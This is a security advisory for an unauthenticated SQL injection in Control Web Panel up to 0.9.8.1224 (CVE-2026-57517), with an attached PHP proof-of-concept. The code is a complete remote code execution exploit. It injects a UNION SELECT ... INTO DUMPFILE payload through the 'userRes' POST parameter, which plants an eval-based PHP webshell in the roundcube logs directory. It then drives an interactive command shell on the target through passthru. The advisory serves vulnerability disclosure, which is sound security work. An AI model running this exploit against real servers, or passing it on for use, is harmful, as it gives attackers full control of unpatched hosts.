---------------------------------------------------------------------
    Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
    ---------------------------------------------------------------------
    
    
    [-] Software Link:
    
    https://control-webpanel.com
    
    
    [-] Affected Versions:
    
    Version 0.9.8.1224 and prior versions.
    
    
    [-] Vulnerability Description:
    
    User input passed through the "userRes" POST parameter to
    https://[CWP_Host]:2083/[CWP_Username]/
    is embedded in an SQL query without being validated or parameterized. This
    can be exploited by remote, unauthenticated attackers to carry out (blind)
    SQL Injection attacks.
    
    Successful exploitation of this vulnerability requires the attacker to know
    or correctly guess the username of a valid non-root account on the affected
    CWP instance.
    
    NOTE: successful exploitation allows an unauthenticated attacker to execute
    arbitrary SQL queries with the privileges of the MySQL root user. Because
    this account possesses the global FILE privilege, the vulnerability can be
    leveraged to write arbitrary files to the underlying filesystem using
    MySQL's file output capabilities (e.g., INTO DUMPFILE). Note that such
    writes are performed by the MySQL server process, so the target directory
    must be writable by that process and not excluded by the server's
    secure_file_priv setting. By writing a malicious PHP payload to the
    web-accessible /usr/local/cwpsrv/var/services/roundcube/logs/ directory,
    an attacker might be able to execute arbitrary PHP code remotely,
    resulting in full Remote Code Execution (RCE) on the affected CWP instance
    with the privileges of the 'cwpsvc' account.
    
    
    [-] Proof of Concept:
    
    https://karmainsecurity.com/pocs/CVE-2026-57517.php
    
    
    [-] Solution:
    
    Upgrade to version 0.9.8.1225 or later.
    
    
    [-] Disclosure Timeline:
    
    [XX/YY/2025] - Vulnerability discovered
    [06/05/2026] - Version 0.9.8.1225 released, issue fixed by the vendor
    [26/06/2026] - CVE identifier requested
    [26/06/2026] - CVE identifier assigned
    [01/07/2026] - Public disclosure
    
    
    [-] CVE Reference:
    
    CVE-2026-57517 has been assigned to this vulnerability.
    
    
    [-] Credits:
    
    Vulnerability discovered by Egidio Romano.
    
    
    [-] Original Advisory:
    
    https://karmainsecurity.com/KIS-2026-12
    
    
    --- packet storm attached poc ---
    
    <?php
    
    /*
        ---------------------------------------------------------------------
        Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
        ---------------------------------------------------------------------
        
        author..............: Egidio Romano aka EgiX
        mail................: n0b0d13s[at]gmail[dot]com
        software link.......: https://control-webpanel.com
        
        +-------------------------------------------------------------------------+
        | This proof of concept code was written for educational purpose only.    |
        | Use it at your own risk. Author will not be responsible for any damage. |
        +-------------------------------------------------------------------------+
        
        [-] Original Advisory:
    
        https://karmainsecurity.com/KIS-2026-12
    */
    
    // The shell loop below runs until the user types "exit", so no time limit.
    set_time_limit(0);
    // Suppress warnings/notices; only fatal errors are reported during the run.
    error_reporting(E_ERROR);

    // Banner.
    $rule = "+-----------------------------------------------------------------------+\n";
    print $rule;
    print "| Control Web Panel <= 0.9.8.1224 Remote Code Execution Exploit by EgiX |\n";
    print $rule;

    // Everything is driven through cURL; bail out early if the extension is missing.
    if (!extension_loaded("curl"))
    {
        die("\n[-] cURL extension required!\n\n");
    }

    // Exactly two positional arguments are expected: target host and a CWP username.
    if ($argc !== 3)
    {
        $usage  = "\nUsage......: php $argv[0] <Hostname/IP> <Username>\n";
        $usage .= "\nExample....: php $argv[0] 127.0.0.1 egix";
        $usage .= "\nExample....: php $argv[0] cwp.victim.com bob\n\n";
        print $usage;
        die();
    }
    
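    /**
     * Encode a byte string as a MySQL hexadecimal literal (e.g. "abc" -> "0x616263").
     *
     * The hex literal lets the payload be embedded in the injected query without any
     * quote characters, so it is unaffected by whatever escaping the injection point
     * applies to quotes.
     *
     * @param string $input Raw bytes to encode; an empty string yields "0x".
     * @return string Lowercase, two-digits-per-byte hex literal with a "0x" prefix.
     */
    function hex_enc(string $input): string
    {
        // bin2hex() yields exactly the output of the former sprintf("%02x") loop,
        // without the loop's uninitialised accumulator (an undefined-variable warning
        // that error_reporting(E_ERROR) was merely hiding).
        return "0x" . bin2hex($input);
    }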
    
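    // One cURL handle is reused for both the injection request and the shell loop.
    $ch = curl_init();

    // Injection point: the per-user endpoint on the CWP user port (2083).
    curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2083/{$argv[2]}/");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // TLS verification is disabled on purpose (CWP instances commonly use self-signed
    // certificates). This also means the session can be intercepted in transit.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    // Debug hook: route traffic through a local intercepting proxy.
    //curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");

    print "\n[+] Injecting PHP webshell\n";

    // The dropped file is an unauthenticated eval() backdoor: anyone who learns the
    // (uniqid-based) filename can use it, and it is NOT removed on exit. Clean it up
    // from the target after testing.
    $sh_fname  = uniqid() . ".php";
    $phpshell  = hex_enc("<?php eval(base64_decode(\$_SERVER['HTTP_C'])); ?>");
    // Close the quoted userRes value, UNION a 13-column row whose second column holds
    // the hex-encoded shell, and write it out with INTO DUMPFILE. This needs the MySQL
    // FILE privilege and a target directory writable by the mysqld process (and not
    // blocked by secure_file_priv). The trailing '#' comments out the rest of the query.
    $injection = "\" UNION SELECT 1,{$phpshell},3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE \"/usr/local/cwpsrv/var/services/roundcube/logs/{$sh_fname}\"#";

    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["userRes" => $injection]));

    // A transport-level failure means nothing was written; stop here instead of
    // looping against a shell that cannot exist. (An HTTP error body still returns a
    // string, so only connection/TLS failures are caught by this check.)
    if (curl_exec($ch) === false)
    {
        die("\n[-] Injection request failed: " . curl_error($ch) . "\n\n");
    }

    print "[+] Executing PHP webshell\n";

    // Each command is wrapped so its output can be cut out between the two markers.
    $phpcode = "print '___CMD___'; passthru(base64_decode('%s')); print '___CMD___';";

    // The roundcube logs directory is served on the CWP webmail port (2031).
    curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2031/roundcube/logs/{$sh_fname}");
    curl_setopt($ch, CURLOPT_POST, false);

    while (true)
    {
        print "\ncwp-shell# ";
        // Stop on "exit" or on end of input. Previously a closed stdin made fgets()
        // return false, trim(false) gave "", and the loop spun forever sending
        // empty commands.
        $line = fgets(STDIN);
        if ($line === false) break;
        $cmd = trim($line);
        if ($cmd == "exit") break;

        // The command travels base64-encoded inside the "C" request header.
        curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
        $response = curl_exec($ch);
        if (preg_match("/___CMD___(.*)___CMD___/s", (string) $response, $m))
        {
            print $m[1];
        }
        else
        {
            die("\n[-] Exploit failed!\n");
        }
    }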